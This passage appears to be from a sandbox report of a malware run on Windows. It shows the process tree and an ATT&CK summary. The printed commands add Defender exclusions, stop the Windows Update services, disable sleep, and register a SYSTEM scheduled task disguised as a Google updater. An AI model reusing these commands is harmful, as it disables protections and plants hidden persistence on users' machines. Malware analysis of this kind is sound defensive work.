C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:2336
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:2688
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:2368
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'7⤵
- Command and Scripting Interpreter: PowerShell
PID:1588
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\fontwin\taskeng.exe'7⤵
- Command and Scripting Interpreter: PowerShell
PID:2576
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Java\jre7\lib\audiodg.exe'7⤵
- Command and Scripting Interpreter: PowerShell
PID:2592
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\209d6542-69f6-11ef-b491-62cb582c238c\conhost.exe'7⤵
- Command and Scripting Interpreter: PowerShell
PID:1872
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Microsoft Synchronization Services\ADO.NET\v1.0\cmd.exe'7⤵
- Command and Scripting Interpreter: PowerShell
PID:2960
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\209d6542-69f6-11ef-b491-62cb582c238c\smss.exe'7⤵
- Command and Scripting Interpreter: PowerShell
PID:2380
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\fontwin\MsServerHost.exe'7⤵
- Command and Scripting Interpreter: PowerShell
PID:2124
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\I8fc6IW9GS.bat"7⤵PID:1868
-
C:\Windows\system32\chcp.comchcp 650018⤵PID:1192
-
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:28⤵PID:2540
-
-
C:\Recovery\209d6542-69f6-11ef-b491-62cb582c238c\smss.exe"C:\Recovery\209d6542-69f6-11ef-b491-62cb582c238c\smss.exe"8⤵
- Executes dropped EXE
PID:576
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\twain32.exe"C:\Users\Admin\AppData\Local\Temp\twain32.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2656
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2500
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵
- Suspicious use of WriteProcessMemory
PID:2428 -
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:2484
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:2580
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:2892
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:2464
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:1492
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Power Settings
- Suspicious use of WriteProcessMemory
PID:2204 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1336
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1620
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:564
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2060
-
-
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1952
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#xzibzypo#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:576 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"3⤵
- Scheduled Task/Job: Scheduled Task
PID:2264
-
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"2⤵PID:2536
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2368
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵PID:2148
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:316
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:2840
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:1512
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:2292
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:1536
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Power Settings
PID:3044 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:704
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1820
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1700
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1068
-
-
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1624
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#xzibzypo#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:2596 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"3⤵
- Scheduled Task/Job: Scheduled Task
PID:2488
-
-
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵PID:1368
-
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1932
-
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-15608639672108224950-14715180936211419018321065262048830045-776638947390487830"1⤵PID:1872
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1238398341-659628192-4295670211553003159-576583664-326450821-619744493-1938678142"1⤵PID:1808
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1518977345188156466721413073813216416010243286951207682115-12013319781240109577"1⤵PID:2544
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-774281283-3345379611530120956782601013473500736411323442820940991-1817523791"1⤵PID:2688
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1896547813660978119663986725122283747-566455852-20601186351510509308-1099925271"1⤵PID:2168
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-476339219-18387216091733780528446269900-1203867472-163299656-1278129283400718268"1⤵PID:616
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1425895931-1459155297-1030909657-1404036651-6094235201753784735-659463250-1592003405"1⤵PID:896
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1010810203154649841225170848-4781763591885857547921223131-1520466415-487749862"1⤵PID:784
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-12969235451934801014735408548-484793368-181359751215871930439078045511236588900"1⤵PID:1484
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-13418808911396824779-2055146909663491764-682809211-1297891469-1300561119-752043961"1⤵PID:1796
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "55462212-1228523728-1345552000-996354904-647328365432123280415958590-310174339"1⤵PID:1820
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "291818685358308684-1877777731-737469367-330309447-1043155418235888206-1755703497"1⤵PID:1132
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1338350028-10758663919093015021071437995-1971980825-2114670581-2133448191-1993906817"1⤵PID:2972
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "570627643-1778886505-536157938-269439133910461715-1686100011253201051729689102"1⤵PID:1700
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-320485692028606837131862478819749850435453942545350314472065600854-550363581"1⤵PID:3040
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1403411900899306039-1817528917-768939021729662419-71388544311708852511941323709"1⤵PID:2452
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-140159719963453926915080597548743166-12187560431318289978-942573003-1878308910"1⤵PID:340
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-116027647-2103278187-8367714161166176944527668679-4708047921646396828130079302"1⤵PID:2656
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "886718463-1965334119-836958039-173561535576426255038409670022694739975369401"1⤵PID:1696
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-89340691416722382732311215111334382684-95219281106922508315114122061481644360"1⤵PID:2056
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1826727562-763286189638657688-170591964135094834-842981042-580412234825935535"1⤵PID:936
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1005624702-260780271360611460143038272559407236487138880-442065318863135968"1⤵PID:2660
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1416782018-14199647961089503654-1605954281-17219706821924320427-1917587775-120571326"1⤵PID:2580
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-777673994883885454227234876-1579917893-1207943891003820853-567667348951797558"1⤵PID:2424
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "123536218726514910-112392129034712752354177729-9029685731266937003627726603"1⤵PID:2560
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "2045584484-125649292710281925301860679994-1587036236-1901919754-1123768988-544782946"1⤵PID:2164
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "9658744702061212601839304293529795986-1708592001849241490-1348798236-788107866"1⤵PID:2624
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "832916923-637579412-9491897507095594032052311988951258501-37878278202637464"1⤵PID:1692
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "17958568271608487644-1153548036948975869-2045741807-17481344291565325354969744079"1⤵
- Suspicious use of SetWindowsHookEx
PID:2456
Network
MITRE ATT&CK Enterprise v15
Execution
- Command and Scripting Interpreter (1)
  - PowerShell (1)
- Scheduled Task/Job (1)
  - Scheduled Task (1)
- System Services (1)
  - Service Execution (1)
Persistence
- Boot or Logon Autostart Execution (2)
  - Registry Run Keys / Startup Folder (1)
  - Winlogon Helper DLL (1)
- Create or Modify System Process (1)
  - Windows Service (1)
- Power Settings (1)
- Scheduled Task/Job (1)
  - Scheduled Task (1)
Privilege Escalation
- Boot or Logon Autostart Execution (2)
  - Registry Run Keys / Startup Folder (1)
  - Winlogon Helper DLL (1)
- Create or Modify System Process (1)
  - Windows Service (1)
- Scheduled Task/Job (1)
  - Scheduled Task (1)
Defense Evasion
- Impair Defenses (1)
- Indicator Removal (1)
  - Clear Windows Event Logs (1)
- Modify Registry (2)
Credential Access
- Credentials from Password Stores (1)
  - Credentials from Web Browsers (1)
- Unsecured Credentials (1)
  - Credentials In Files (1)
Downloads